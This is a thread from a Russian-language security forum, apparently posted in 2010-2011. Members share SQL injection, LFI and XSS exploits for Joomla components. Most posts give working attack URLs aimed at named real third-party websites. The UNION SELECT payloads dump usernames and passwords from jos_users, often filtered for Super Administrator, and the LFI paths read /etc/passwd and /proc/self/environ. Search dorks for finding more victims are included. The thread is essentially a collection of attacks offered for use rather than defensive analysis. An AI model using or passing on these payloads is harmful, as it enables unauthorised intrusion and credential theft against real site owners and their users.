HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 06.12.2010, 10:23
z0mbyak
Познающий
Регистрация: 10.04.2010
Сообщений: 49
Провел на форуме:
168709

Репутация: 1
По умолчанию

Наверное надо оживить тему?-)

Компонент: com_storedirectory

Тип: Sql-Inj

Уязвимость в параметре id:

PoC:

http://www.cockburngateway.com.au/index.php?option=com_storedirectory&task=view&id=1 +union+select+1,2,concat%28username,0x3a,password, 0x3a,usertype%29,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21+from+jos_users--
 
Ответить с цитированием

  #2  
Старый 06.12.2010, 18:53
Metis
Новичок
Регистрация: 29.11.2008
Сообщений: 6
Провел на форуме:
177127

Репутация: 29
По умолчанию

Joomla 1.5-xx

com_congratulations

index.php?option=com_congratulations&Itemid=1&task =date&y=2010&m=1+UNION+SELECT+AES_DECRYPT(AES_ENCR YPT(CONCAT((SELECT+TABLE_NAME+FROM+INFORMATION_SCH EMA.TABLES+limit+1,1)),0x71),0x71)--

http://school29.kurgan.cc/index.php?option=com_congratulations&Itemid=1&task =date&y=2010&m=1+UNION+SELECT+AES_DECRYPT(AES_ENCR YPT(CONCAT((SELECT+CONCAT_WS(0x3a,username,passwor d)+FROM+jos_users+limit+1,1)),0x71),0x71)--
 
Ответить с цитированием

  #3  
Старый 14.12.2010, 22:20
z0mbyak
Познающий
Регистрация: 10.04.2010
Сообщений: 49
Провел на форуме:
168709

Репутация: 1
По умолчанию

SQL inj в компоненте com_jeformcr

Доброго времени суток

SQl-Inj в com_jeformcr

Уязвимый параметр: id

Подбор кол-ва колонок через order+by

PoC:

http://www.rcreventos.com.br/rcr/index.php?option=com_jeformcr&view=form&id=-1+union+select+1,2,concat(username,0x3a,password), 4,5,6,7,8,9,10,11+from+jos_users+where+usertype='S uper%20Administrator'--

http://jrfu.org/index.php?option=com_jeformcr&view=form&id=-1+union+select+1,concat(username,0x3a,password),3, 4,5,6,7,8,9,10,11+from+jos_users+where+usertype='S uper%20Administrator'--
 
Ответить с цитированием

  #4  
Старый 02.01.2011, 02:40
JOSSe7
Guest
Сообщений: n/a
Провел на форуме:
1686

Репутация: 0
По умолчанию

Уязвимость: SQL Injection Vulnerability

Компонент: com_idoblog

Dork: inurl:"com_idoblog"

Language: php

http://extensions.joomla.org/extensions/news-production/blog/9218

Exploit:

http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1 337&userid=62+union+select+1,2,concat%28username,0 x3a,password,0x3a,email%29,4,5,6,7,8,9,10,11,12,13 ,14,15,16+from+jos_users--
 
Ответить с цитированием

  #5  
Старый 19.01.2011, 01:09
usr-bin
Guest
Сообщений: n/a
Провел на форуме:
8038

Репутация: 5
По умолчанию

Уязвимость: Blind SQL Injection Vulnerability

Компонент: allCineVid

Dork: inurl:"com_allcinevid"

Language: php

http://www.joomtraders.com

Exploit:

http://site/path/index.php?option=com_allcinevid&tmpl=component&id= 1 and 1=1

http://site/path/index.php?option=com_allcinevid&tmpl=component&id= 1 and 1=0
 
Ответить с цитированием

  #6  
Старый 24.01.2011, 23:56
usr-bin
Guest
Сообщений: n/a
Провел на форуме:
8038

Репутация: 5
По умолчанию

Уязвимость: Multiple SQL Injection Vulnerability

Компонент: Portfolio

Dork: inurl:"com_allcinevid"

Language: php

http://www.salvatorefresta.net

Exploit:

http://site/path/index.php?option=com_b2portfolio&c=-1 UNION SELECT 1,concat(username,0x34,password),3,4,5 FROM jos_users
 
Ответить с цитированием

  #7  
Старый 15.02.2011, 02:22
foozzi
Новичок
Регистрация: 13.04.2010
Сообщений: 0
Провел на форуме:
1350

Репутация: 0
По умолчанию

Joomla active XSS JFilterInput

Наличие эксплоита: Да

Активная XSS в Joomla версии 1.6 и более ранних. Уязвимость связана с недостаточной

фильтрацией входных данных в классе JFilterInput.

В версии 1.6, к примеру, можно проверить при включенном модуле Userrofile, вбив в поле About Me

следующий код:

Код:
Code:
В остальных случаях и версиях данной уязвимости подвержен любой модуль который принимает данные от пользователя.
 
Ответить с цитированием

  #8  
Старый 09.04.2011, 14:32
White Bear
Guest
Сообщений: n/a
Провел на форуме:
1941

Репутация: 0
По умолчанию

(com_jce) BLIND sql injection vulnerability

Description:

JCE makes creating and editing Joomla!®

content easy Add a set of tools to your Joomla!® environment that give you the power to create the kind of content you want,

without limitations, and without needing to know or learn HTML, XHTML, CSS...

exploit & p0c

[!] index.php?option=com_jce&Itemid=[valid Itemid]

Example p0c

[!] http://host/index.php?option=com_jce&Itemid=8
 
Ответить с цитированием

  #9  
Старый 10.04.2011, 16:39
z0mbyak
Познающий
Регистрация: 10.04.2010
Сообщений: 49
Провел на форуме:
168709

Репутация: 1
По умолчанию

LFI in Joomla component com_immobilien

Доброго времени суток, уважаемые форумчане.

Тип: LFI

Компонент: com_immobilien

Версия: Не знаю, тк шелл не залил

Найдена: 10.04.2011 by z0mbyak

Dork: inurl:"com_immobilien"

Vuln Code: Не искал)))

Link:

index.php?option=com_immobilien&controller=

Exploit:

../../../../../../../../../../../etc/passwd%00

PoC:

http://www.sundz-immobilien.de/index.php?option=com_immobilien&controller=../../../CREDITS.php%00

http://www.szaboimmobilien.de/index.php?option=com_immobilien&controller=../../../../../../../../../../../proc/self/environ%00

P.S Вроде не боян)
 
Ответить с цитированием

  #10  
Старый 10.04.2011, 23:54
z0mbyak
Познающий
Регистрация: 10.04.2010
Сообщений: 49
Провел на форуме:
168709

Репутация: 1
По умолчанию

Multiple Vulnerabilities in Jomla Component com_tender

И снова здравствуйте)

Тип: LFI

exploit: ../../../../../../../../../../etc/passwd%00

PoC:

http://www.moscow-tenders.ru/index.php?option=com_tender&controller=../../../../../../../../../../etc/passwd%00


Тип: Sql Inj

Вообще, массового я так и не нашел, но компонент очень дырявый)

PoC:

http://irp.omsk.info/index.php?option=com_tender&view=list&filter_type= category&filter_category%5B%5D=327&Itemid=5&comple ted=-1+union+select+1,2,3,4,5,concat(username,0x3a,pass word,0x3a,usertype),7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36+from+jos_users+where+usertype='Super%20Admi nistrator'--

https://www.itbidding.com/index.php?option=com_tender&act=opening_tender&act ion=edit_opening_tender&gov_tender_id=-26+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--

P.S. Надеюсь не баян)))
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Обзор уязвимостей в форумных движках] Grey Уязвимости CMS / форумов 49 02.04.2015 17:48
Обзор бесплатных Cms em00s7 PHP 16 03.07.2009 13:13
Cms Cawabunga PHP 20 05.08.2007 00:31



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ